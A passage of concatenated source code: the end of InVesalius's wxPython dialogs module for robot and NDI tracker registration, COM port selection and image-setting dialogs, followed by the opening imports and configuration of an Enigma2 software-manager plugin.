choices=robot_ip_options, style=wx.CB_DROPDOWN | wx.TE_PROCESS_ENTER)
choice_IP.SetToolTip(tooltip)
choice_IP.SetSelection(const.DEFAULT_TRACKER)
choice_IP.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceIP, ctrl=choice_IP))
choice_IP.Bind(wx.EVT_TEXT, partial(self.OnTxt_Ent, ctrl=choice_IP))
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(choice_IP, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((15, 15))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.CenterOnParent()
def OnTxt_Ent(self, evt, ctrl):
self.robot_ip = str(ctrl.GetValue())
def OnChoiceIP(self, evt, ctrl):
self.robot_ip = ctrl.GetStringSelection()
def GetValue(self):
return self.robot_ip
class CreateTransformationMatrixRobot(wx.Dialog):
def __init__(self, tracker, title=_("Create transformation matrix to robot space")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, #size=wx.Size(1000, 200),
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
'''
M_robot_2_tracker is created by an affine transformation. Robot TCP should be calibrated to the center of the tracker marker
'''
#TODO: make aboutbox
self.tracker_coord = []
self.tracker_angles = []
self.robot_coord = []
self.robot_angles = []
self.tracker = tracker
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnUpdate, self.timer)
self._init_gui()
def _init_gui(self):
# Buttons to acquire and remove points
txt_acquisition = wx.StaticText(self, -1, _('Poses acquisition for robot registration:'))
btn_create_point = wx.Button(self, -1, label=_('Single'))
btn_create_point.Bind(wx.EVT_BUTTON, self.OnCreatePoint)
btn_cont_point = wx.ToggleButton(self, -1, label=_('Continuous'))
btn_cont_point.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnContinuousAcquisition, btn=btn_cont_point))
self.btn_cont_point = btn_cont_point
txt_number = wx.StaticText(self, -1, _('0'))
txt_recorded = wx.StaticText(self, -1, _('Poses recorded'))
self.txt_number = txt_number
btn_reset = wx.Button(self, -1, label=_('Reset'))
btn_reset.Bind(wx.EVT_BUTTON, self.OnReset)
btn_apply_reg = wx.Button(self, -1, label=_('Apply'))
btn_apply_reg.Bind(wx.EVT_BUTTON, self.OnApply)
btn_apply_reg.Enable(False)
self.btn_apply_reg = btn_apply_reg
# Buttons to save and load
txt_file = wx.StaticText(self, -1, _('Registration file'))
btn_save = wx.Button(self, -1, label=_('Save'), size=wx.Size(65, 23))
btn_save.Bind(wx.EVT_BUTTON, self.OnSaveReg)
btn_save.Enable(False)
self.btn_save = btn_save
btn_load = wx.Button(self, -1, label=_('Load'), size=wx.Size(65, 23))
btn_load.Bind(wx.EVT_BUTTON, self.OnLoadReg)
# Create a horizontal sizers
border = 1
acquisition = wx.BoxSizer(wx.HORIZONTAL)
acquisition.AddMany([(btn_create_point, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(btn_cont_point, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])
txt_pose = wx.BoxSizer(wx.HORIZONTAL)
txt_pose.AddMany([(txt_number, 1, wx.LEFT, 50),
(txt_recorded, 1, wx.LEFT, border)])
apply_reset = wx.BoxSizer(wx.HORIZONTAL)
apply_reset.AddMany([(btn_reset, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(btn_apply_reg, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])
save_load = wx.BoxSizer(wx.HORIZONTAL)
save_load.AddMany([(btn_save, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(btn_load, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_ok.Enable(False)
self.btn_ok = btn_ok
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
# Add line sizers into main sizer
border = 10
border_last = 10
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
main_sizer.Add(txt_acquisition, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_HORIZONTAL , border)
main_sizer.Add(acquisition, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
main_sizer.Add(txt_pose, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border)
main_sizer.Add(apply_reset, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT , border_last)
main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
main_sizer.Add(txt_file, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border/2)
main_sizer.Add(save_load, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
main_sizer.Add(btnsizer, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
main_sizer.Fit(self)
self.SetSizer(main_sizer)
self.Update()
main_sizer.Fit(self)
self.CenterOnParent()
def affine_correg(self, tracker, robot):
m_change = tr.affine_matrix_from_points(robot[:].T, tracker[:].T,
shear=False, scale=False, usesvd=False)
return m_change
def OnContinuousAcquisition(self, evt=None, btn=None):
value = btn.GetValue()
if value:
self.timer.Start(500)
else:
self.timer.Stop()
def OnUpdate(self, evt):
self.OnCreatePoint(evt=None)
def OnCreatePoint(self, evt):
coord_raw, markers_flag = self.tracker.TrackerCoordinates.GetCoordinates()
#robot thread is not initialized yet
coord_raw_robot = self.tracker.trk_init[0][1][0].Run()
coord_raw_tracker_obj = coord_raw[3]
if markers_flag[2]:
self.tracker_coord.append(coord_raw_tracker_obj[:3])
self.tracker_angles.append(coord_raw_tracker_obj[3:])
self.robot_coord.append(coord_raw_robot[:3])
self.robot_angles.append(coord_raw_robot[3:])
self.txt_number.SetLabel(str(int(self.txt_number.GetLabel())+1))
else:
print('Cannot detect the coil markers, pls try again')
if len(self.tracker_coord) >= 3:
self.btn_apply_reg.Enable(True)
def OnReset(self, evt):
if self.btn_cont_point:
self.btn_cont_point.SetValue(False)
self.OnContinuousAcquisition(evt=None, btn=self.btn_cont_point)
self.tracker_coord = []
self.tracker_angles = []
self.robot_coord = []
self.robot_angles = []
self.M_tracker_2_robot = []
self.txt_number.SetLabel('0')
self.btn_apply_reg.Enable(False)
self.btn_save.Enable(False)
self.btn_ok.Enable(False)
def OnApply(self, evt):
if self.btn_cont_point:
self.btn_cont_point.SetValue(False)
self.OnContinuousAcquisition(evt=None, btn=self.btn_cont_point)
tracker_coord = np.array(self.tracker_coord)
robot_coord = np.array(self.robot_coord)
M_robot_2_tracker = self.affine_correg(tracker_coord, robot_coord)
M_tracker_2_robot = tr.inverse_matrix(M_robot_2_tracker)
self.M_tracker_2_robot = M_tracker_2_robot
self.btn_save.Enable(True)
self.btn_ok.Enable(True)
#TODO: make a colored circle to sinalize that the transformation was made (green) (red if not)
def OnSaveReg(self, evt):
filename = ShowLoadSaveDialog(message=_(u"Save robot transformation file as..."),
wildcard=_("Robot transformation files (*.rbtf)|*.rbtf"),
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_filename="robottransform.rbtf", save_ext="rbtf")
if filename:
if self.M_tracker_2_robot is not None:
with open(filename, 'w', newline='') as file:
writer = csv.writer(file, delimiter='\t')
writer.writerows(self.M_tracker_2_robot)
def OnLoadReg(self, evt):
filename = ShowLoadSaveDialog(message=_(u"Load robot transformation"),
wildcard=_("Robot transformation files (*.rbtf)|*.rbtf"))
if filename:
with open(filename, 'r') as file:
reader = csv.reader(file, delimiter='\t')
content = [row for row in reader]
self.M_tracker_2_robot = np.vstack(list(np.float_(content)))
print("Matrix tracker to robot:", self.M_tracker_2_robot)
self.btn_ok.Enable(True)
def GetValue(self):
return self.M_tracker_2_robot
class SetNDIconfigs(wx.Dialog):
def __init__(self, title=_("Setting NDI polaris configs:")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
self._init_gui()
def serial_ports(self):
"""
Lists serial port names and pre-select the description containing NDI
"""
import serial.tools.list_ports
ports = serial.tools.list_ports.comports()
if sys.platform.startswith('win'):
port_list = []
desc_list = []
for port, desc, hwid in sorted(ports):
port_list.append(port)
desc_list.append(desc)
port_selec = [i for i, e in enumerate(desc_list) if 'NDI' in e]
else:
raise EnvironmentError('Unsupported platform')
#print("Here is the chosen port: {} with id {}".format(port_selec[0], port_selec[1]))
return port_list, port_selec
def _init_gui(self):
com_ports = wx.ComboBox(self, -1, style=wx.CB_DROPDOWN|wx.CB_READONLY)
com_ports.Bind(wx.EVT_COMBOBOX, partial(self.OnChoicePort, ctrl=com_ports))
row_com = wx.BoxSizer(wx.VERTICAL)
row_com.Add(wx.StaticText(self, wx.ID_ANY, "Select the COM port"), 0, wx.TOP|wx.RIGHT,5)
row_com.Add(com_ports, 0, wx.EXPAND)
port_list, port_selec = self.serial_ports()
com_ports.Append(port_list)
if port_selec:
com_ports.SetSelection(port_selec[0])
self.com_ports = com_ports
session = ses.Session()
last_ndi_probe_marker = session.get('paths', 'last_ndi_probe_marker', '')
last_ndi_ref_marker = session.get('paths', 'last_ndi_ref_marker', '')
last_ndi_obj_marker = session.get('paths', 'last_ndi_obj_marker', '')
if not last_ndi_probe_marker:
last_ndi_probe_marker = inv_paths.NDI_MAR_DIR_PROBE
if not last_ndi_ref_marker:
last_ndi_ref_marker = inv_paths.NDI_MAR_DIR_REF
if not last_ndi_obj_marker:
last_ndi_obj_marker = inv_paths.NDI_MAR_DIR_OBJ
self.dir_probe = wx.FilePickerCtrl(self, path=last_ndi_probe_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
wildcard="Rom files (*.rom)|*.rom", message="Select probe's rom file")
row_probe = wx.BoxSizer(wx.VERTICAL)
row_probe.Add(wx.StaticText(self, wx.ID_ANY, "Set probe's rom file"), 0, wx.TOP|wx.RIGHT, 5)
row_probe.Add(self.dir_probe, 0, wx.ALL | wx.CENTER | wx.EXPAND)
self.dir_ref = wx.FilePickerCtrl(self, path=last_ndi_ref_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
wildcard="Rom files (*.rom)|*.rom", message="Select reference's rom file")
row_ref = wx.BoxSizer(wx.VERTICAL)
row_ref.Add(wx.StaticText(self, wx.ID_ANY, "Set reference's rom file"), 0, wx.TOP | wx.RIGHT, 5)
row_ref.Add(self.dir_ref, 0, wx.ALL | wx.CENTER | wx.EXPAND)
self.dir_obj = wx.FilePickerCtrl(self, path=last_ndi_obj_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
wildcard="Rom files (*.rom)|*.rom", message="Select object's rom file")
#self.dir_probe.Bind(wx.EVT_FILEPICKER_CHANGED, self.Selected)
row_obj = wx.BoxSizer(wx.VERTICAL)
row_obj.Add(wx.StaticText(self, wx.ID_ANY, "Set object's rom file"), 0, wx.TOP|wx.RIGHT, 5)
row_obj.Add(self.dir_obj, 0, wx.ALL | wx.CENTER | wx.EXPAND)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
if not port_selec:
btn_ok.Enable(False)
self.btn_ok = btn_ok
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(row_com, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(row_probe, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(row_ref, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(row_obj, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((15, 15))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.CenterOnParent()
def OnChoicePort(self, evt, ctrl):
self.btn_ok.Enable(True)
def GetValue(self):
fn_probe = self.dir_probe.GetPath().encode(const.FS_ENCODE)
fn_ref = self.dir_ref.GetPath().encode(const.FS_ENCODE)
fn_obj = self.dir_obj.GetPath().encode(const.FS_ENCODE)
if fn_probe and fn_ref and fn_obj:
session = ses.Session()
session['paths']['last_ndi_probe_marker'] = self.dir_probe.GetPath()
session['paths']['last_ndi_ref_marker'] = self.dir_ref.GetPath()
session['paths']['last_ndi_obj_marker'] = self.dir_obj.GetPath()
session.WriteSessionFile()
return self.com_ports.GetString(self.com_ports.GetSelection()).encode(const.FS_ENCODE), fn_probe, fn_ref, fn_obj
class SetCOMPort(wx.Dialog):
def __init__(self, select_baud_rate, title=_("Select COM port")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.STAY_ON_TOP)
self.select_baud_rate = select_baud_rate
self._init_gui()
def serial_ports(self):
"""
Lists serial port names
"""
import serial.tools.list_ports
if sys.platform.startswith('win'):
ports = ([comport.device for comport in serial.tools.list_ports.comports()])
else:
raise EnvironmentError('Unsupported platform')
return ports
def _init_gui(self):
# COM port selection
ports = self.serial_ports()
self.com_port_dropdown = wx.ComboBox(self, -1, choices=ports, style=wx.CB_DROPDOWN | wx.CB_READONLY)
self.com_port_dropdown.SetSelection(0)
com_port_text_and_dropdown = wx.BoxSizer(wx.VERTICAL)
com_port_text_and_dropdown.Add(wx.StaticText(self, wx.ID_ANY, "COM port"), 0, wx.TOP | wx.RIGHT,5)
com_port_text_and_dropdown.Add(self.com_port_dropdown, 0, wx.EXPAND)
# Baud rate selection
if self.select_baud_rate:
baud_rates_as_strings = [str(baud_rate) for baud_rate in const.BAUD_RATES]
self.baud_rate_dropdown = wx.ComboBox(self, -1, choices=baud_rates_as_strings, style=wx.CB_DROPDOWN | wx.CB_READONLY)
self.baud_rate_dropdown.SetSelection(const.BAUD_RATE_DEFAULT_SELECTION)
baud_rate_text_and_dropdown = wx.BoxSizer(wx.VERTICAL)
baud_rate_text_and_dropdown.Add(wx.StaticText(self, wx.ID_ANY, "Baud rate"), 0, wx.TOP | wx.RIGHT,5)
baud_rate_text_and_dropdown.Add(self.baud_rate_dropdown, 0, wx.EXPAND)
# OK and Cancel buttons
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
# Set up the main sizer
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(com_port_text_and_dropdown, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
if self.select_baud_rate:
main_sizer.Add((5, 5))
main_sizer.Add(baud_rate_text_and_dropdown, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.CenterOnParent()
def GetCOMPort(self):
com_port = self.com_port_dropdown.GetString(self.com_port_dropdown.GetSelection())
return com_port
def GetBaudRate(self):
if not self.select_baud_rate:
return None
baud_rate = self.baud_rate_dropdown.GetString(self.baud_rate_dropdown.GetSelection())
return baud_rate
class ManualWWWLDialog(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent, -1, _("Set WW&WL manually"))
self._init_gui()
def _init_gui(self):
import invesalius.data.slice_ as slc
ww = slc.Slice().window_width
wl = slc.Slice().window_level
self.txt_wl = wx.TextCtrl(self, -1, str(int(wl)))
wl_sizer = wx.BoxSizer(wx.HORIZONTAL)
wl_sizer.Add(wx.StaticText(self, -1, _("Window Level")), 0, wx.ALIGN_CENTER_VERTICAL)
wl_sizer.Add(self.txt_wl, 1, wx.ALL | wx.EXPAND, 5)
wl_sizer.Add(wx.StaticText(self, -1, _("WL")), 0, wx.ALIGN_CENTER_VERTICAL)
self.txt_ww = wx.TextCtrl(self, -1, str(int(ww)))
ww_sizer = wx.BoxSizer(wx.HORIZONTAL)
ww_sizer.Add(wx.StaticText(self, -1, _("Window Width")), 0, wx.ALIGN_CENTER_VERTICAL)
ww_sizer.Add(self.txt_ww, 1, wx.ALL | wx.EXPAND, 5)
ww_sizer.Add(wx.StaticText(self, -1, _("WW")), 0, wx.ALIGN_CENTER_VERTICAL)
btn_ok = wx.Button(self, wx.ID_OK)
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(wl_sizer, 1, wx.ALL | wx.EXPAND, 5)
main_sizer.Add(ww_sizer, 1, wx.ALL | wx.EXPAND, 5)
main_sizer.Add(btnsizer, 1, wx.ALL | wx.EXPAND, 5)
btn_ok.Bind(wx.EVT_BUTTON, self.OnOK)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
main_sizer.SetSizeHints(self)
self.Layout()
self.Center()
def OnOK(self, evt):
try:
ww = int(self.txt_ww.GetValue())
wl = int(self.txt_wl.GetValue())
except ValueError:
self.Close()
return
Publisher.sendMessage('Bright and contrast adjustment image', window=ww, level=wl)
const.WINDOW_LEVEL['Manual'] = (ww, wl)
Publisher.sendMessage('Check window and level other')
Publisher.sendMessage('Update window level value', window=ww, level=wl)
#Necessary update the slice plane in the volume case exists
Publisher.sendMessage('Update slice viewer')
Publisher.sendMessage('Render volume viewer')
self.Close()
def OnCancel(self, evt):
self.Close()
def OnClose(self, evt):
self.Destroy()
class SetSpacingDialog(wx.Dialog):
def __init__(
self,
parent,
sx,
sy,
sz,
title=_("Set spacing"),
style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.STAY_ON_TOP,
):
wx.Dialog.__init__(self, parent, -1, title=title, style=style)
self.spacing_original_x = sx
self.spacing_original_y = sy
self.spacing_original_z = sz
self._init_gui()
self._bind_events()
def _init_gui(self):
self.txt_spacing_new_x = wx.TextCtrl(self, -1, value=str(self.spacing_original_x))
self.txt_spacing_new_y = wx.TextCtrl(self, -1, value=str(self.spacing_original_y))
self.txt_spacing_new_z = wx.TextCtrl(self, -1, value=str(self.spacing_original_z))
sizer_new = wx.FlexGridSizer(3, 2, 5, 5)
sizer_new.AddMany(
(
(wx.StaticText(self, -1, "Spacing X"), 0, wx.ALIGN_CENTER_VERTICAL),
(self.txt_spacing_new_x, 1, wx.EXPAND),
(wx.StaticText(self, -1, "Spacing Y"), 0, wx.ALIGN_CENTER_VERTICAL),
(self.txt_spacing_new_y, 1, wx.EXPAND),
(wx.StaticText(self, -1, "Spacing Z"), 0, wx.ALIGN_CENTER_VERTICAL),
(self.txt_spacing_new_z, 1, wx.EXPAND),
)
)
self.button_ok = wx.Button(self, wx.ID_OK)
self.button_cancel = wx.Button(self, wx.ID_CANCEL)
button_sizer = wx.StdDialogButtonSizer()
button_sizer.AddButton(self.button_ok)
button_sizer.AddButton(self.button_cancel)
button_sizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(wx.StaticText(self, -1, _("It was not possible to obtain the image spacings.\nPlease set it correctly:")), 0, wx.EXPAND)
main_sizer.Add(sizer_new, 1, wx.EXPAND | wx.ALL, 5)
main_sizer.Add(button_sizer, 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 5)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.Layout()
def _bind_events(self):
self.txt_spacing_new_x.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)
self.txt_spacing_new_y.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)
self.txt_spacing_new_z.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)
self.button_ok.Bind(wx.EVT_BUTTON, self.OnOk)
self.button_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
def OnSetNewSpacing(self, evt):
try:
new_spacing_x = float(self.txt_spacing_new_x.GetValue())
except ValueError:
new_spacing_x = self.spacing_new_x
try:
new_spacing_y = float(self.txt_spacing_new_y.GetValue())
except ValueError:
new_spacing_y = self.spacing_new_y
try:
new_spacing_z = float(self.txt_spacing_new_z.GetValue())
except ValueError:
new_spacing_z = self.spacing_new_z
self.set_new_spacing(new_spacing_x, new_spacing_y, new_spacing_z)
def set_new_spacing(self, sx, sy, sz):
self.spacing_new_x = sx
self.spacing_new_y = sy
self.spacing_new_z = sz
self.txt_spacing_new_x.ChangeValue(str(sx))
self.txt_spacing_new_y.ChangeValue(str(sy))
self.txt_spacing_new_z.ChangeValue(str(sz))
def OnOk(self, evt):
if self.spacing_new_x == 0.0:
self.txt_spacing_new_x.SetFocus()
elif self.spacing_new_y == 0.0:
self.txt_spacing_new_y.SetFocus()
elif self.spacing_new_z == 0.0:
self.txt_spacing_new_z.SetFocus()
else:
self.EndModal(wx.ID_OK)
def OnCancel(self, evt):
self.EndModal(wx.ID_CANCEL)
class PeelsCreationDlg(wx.Dialog):
FROM_MASK = 1
FROM_FILES = 2
def __init__(self, parent, *args, **kwds):
wx.Dialog.__init__(self, parent, *args, **kwds)
self.mask_path = ''
self.method = self.FROM_MASK
self._init_gui()
self._bind_events_wx()
self.get_all_masks()
def _init_gui(self):
self.SetTitle("dialog")
from_mask_stbox = self._from_mask_gui()
from_files_stbox = self._from_files_gui()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(from_mask_stbox, 0, wx.EXPAND | wx.ALL, 5)
main_sizer.Add(from_files_stbox, 0, wx.EXPAND | wx.ALL, 5)
btn_sizer = wx.StdDialogButtonSizer()
main_sizer.Add(btn_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 4)
self.btn_ok = wx.Button(self, wx.ID_OK, "")
self.btn_ok.SetDefault()
btn_sizer.AddButton(self.btn_ok)
self.btn_cancel = wx.Button(self, wx.ID_CANCEL, "")
btn_sizer.AddButton(self.btn_cancel)
btn_sizer.Realize()
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.SetAffirmativeId(self.btn_ok.GetId())
self.SetEscapeId(self.btn_cancel.GetId())
self.Layout()
def _from_mask_gui(self):
mask_box = wx.StaticBox(self, -1, _("From mask"))
from_mask_stbox = wx.StaticBoxSizer(mask_box, wx.VERTICAL)
self.cb_masks = wx.ComboBox(self, wx.ID_ANY, choices=[])
self.from_mask_rb = wx.RadioButton(self, -1, "", style = wx.RB_GROUP)
internal_sizer = wx.BoxSizer(wx.HORIZONTAL)
internal_sizer.Add(self.from_mask_rb, 0, wx.ALL | wx.EXPAND, 5)
internal_sizer.Add(self.cb_masks, 1, wx.ALL | wx.EXPAND, 5)
from_mask_stbox.Add(internal_sizer, 0, wx.EXPAND)
return from_mask_stbox
def _from_files_gui(self):
session = ses.Session()
last_directory = session.get('paths', 'last_directory_%d' % const.ID_NIFTI_IMPORT, '')
files_box = wx.StaticBox(self, -1, _("From files"))
from_files_stbox = wx.StaticBoxSizer(files_box, wx.VERTICAL)
self.mask_file_browse = filebrowse.FileBrowseButton(self, -1, labelText=_("Mask file"),
fileMask=WILDCARD_NIFTI, dialogTitle=_("Choose Mask file"), startDirectory = last_directory,
changeCallback=lambda evt: self._set_files_callback(mask_path=evt.GetString()))
self.from_files_rb = wx.RadioButton(self, -1, "")
ctrl_sizer = wx.BoxSizer(wx.VERTICAL)
ctrl_sizer.Add(self.mask_file_browse, 0, wx.ALL | wx.EXPAND, 5)
internal_sizer = wx.BoxSizer(wx.HORIZONTAL)
internal_sizer.Add(self.from_files_rb, 0, wx.ALL | wx.EXPAND, 5)
internal_sizer.Add(ctrl_sizer, 0, wx.ALL | wx.EXPAND, 5)
from_files_stbox.Add(internal_sizer, 0, wx.EXPAND)
return from_files_stbox
def _bind_events_wx(self):
self.from_mask_rb.Bind(wx.EVT_RADIOBUTTON, self.on_select_method)
self.from_files_rb.Bind(wx.EVT_RADIOBUTTON, self.on_select_method)
def get_all_masks(self):
import invesalius.project as prj
inv_proj = prj.Project()
choices = [i.name for i in inv_proj.mask_dict.values()]
try:
initial_value = choices[0]
enable = True
except IndexError:
initial_value = ""
enable = False
self.cb_masks.SetItems(choices)
self.cb_masks.SetValue(initial_value)
self.btn_ok.Enable(enable)
def on_select_method(self, evt):
radio_selected = evt.GetEventObject()
if radio_selected is self.from_mask_rb:
self.method = self.FROM_MASK
if self.cb_masks.GetItems():
self.btn_ok.Enable(True)
else:
self.btn_ok.Enable(False)
else:
self.method = self.FROM_FILES
if self._check_if_files_exists():
self.btn_ok.Enable(True)
else:
self.btn_ok.Enable(False)
def _set_files_callback(self, mask_path=''):
if mask_path:
self.mask_path = mask_path
if self.method == self.FROM_FILES:
if self._check_if_files_exists():
self.btn_ok.Enable(True)
else:
self.btn_ok.Enable(False)
def _check_if_files_exists(self):
if self.mask_path and os.path.exists(self.mask_path):
return True
else:
return False
| rmatsuda/invesalius3 | invesalius/gui/dialogs.py | Python | gpl-2.0 | 189,985 |
from Plugins.Plugin import PluginDescriptor
from Screens.Console import Console
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from Screens.Standby import TryQuitMainloop
from Screens.Ipkg import Ipkg
from Screens.SoftwareUpdate import UpdatePlugin
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Input import Input
from Components.Ipkg import IpkgComponent
from Components.Sources.StaticText import StaticText
from Components.ScrollLabel import ScrollLabel
from Components.Pixmap import Pixmap
from Components.MenuList import MenuList
from Components.Sources.List import List
from Components.Slider import Slider
from Components.Harddisk import harddiskmanager
from Components.config import config,getConfigListEntry, ConfigSubsection, ConfigText, ConfigLocations, ConfigYesNo, ConfigSelection
from Components.ConfigList import ConfigListScreen
from Components.Console import Console
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.SelectionList import SelectionList
from Components.PluginComponent import plugins
from Components.About import about
from Components.PackageInfo import PackageInfoHandler
from Components.Language import language
from Components.AVSwitch import AVSwitch
from Components.Task import job_manager
from Tools.Directories import pathExists, fileExists, resolveFilename, SCOPE_PLUGINS, SCOPE_CURRENT_PLUGIN, SCOPE_CURRENT_SKIN, SCOPE_METADIR
from Tools.LoadPixmap import LoadPixmap
from Tools.NumericalTextInput import NumericalTextInput
from enigma import eTimer, RT_HALIGN_LEFT, RT_VALIGN_CENTER, eListboxPythonMultiContent, eListbox, gFont, getDesktop, ePicLoad, eRCInput, getPrevAsciiCode, eEnv, iRecordableService
from cPickle import dump, load
from os import path as os_path, system as os_system, unlink, stat, mkdir, popen, makedirs, listdir, access, rename, remove, W_OK, R_OK, F_OK
from time import time, gmtime, strftime, localtime
from stat import ST_MTIME
from datetime import date
from twisted.web import client
from twisted.internet import reactor
from ImageWizard import ImageWizard
from BackupRestore import BackupSelection, RestoreMenu, BackupScreen, RestoreScreen, getBackupPath, getBackupFilename
from SoftwareTools import iSoftwareTools
config.plugins.configurationbackup = ConfigSubsection()
config.plugins.configurationbackup.backuplocation = ConfigText(default = '/media/hdd/', visible_width = 50, fixed_size = False)
config.plugins.configurationbackup.backupdirs = ConfigLocations(default=[eEnv.resolve('${sysconfdir}/enigma2/'), '/etc/network/interfaces', '/etc/wpa_supplicant.conf', '/etc/wpa_supplicant.ath0.conf', '/etc/wpa_supplicant.wlan0.conf', '/etc/resolv.conf', '/etc/default_gw', '/etc/hostname'])
config.plugins.softwaremanager = ConfigSubsection()
config.plugins.softwaremanager.overwriteConfigFiles = ConfigSelection(
[
("Y", _("Yes, always")),
("N", _("No, never")),
("ask", _("Always ask"))
], "Y")
config.plugins.softwaremanager.onSetupMenu = ConfigYesNo(default=False)
config.plugins.softwaremanager.onBlueButton = ConfigYesNo(default=False)
def write_cache(cache_file, cache_data):
#Does a cPickle dump
if not os_path.isdir( os_path.dirname(cache_file) ):
try:
mkdir( os_path.dirname(cache_file) )
except OSError:
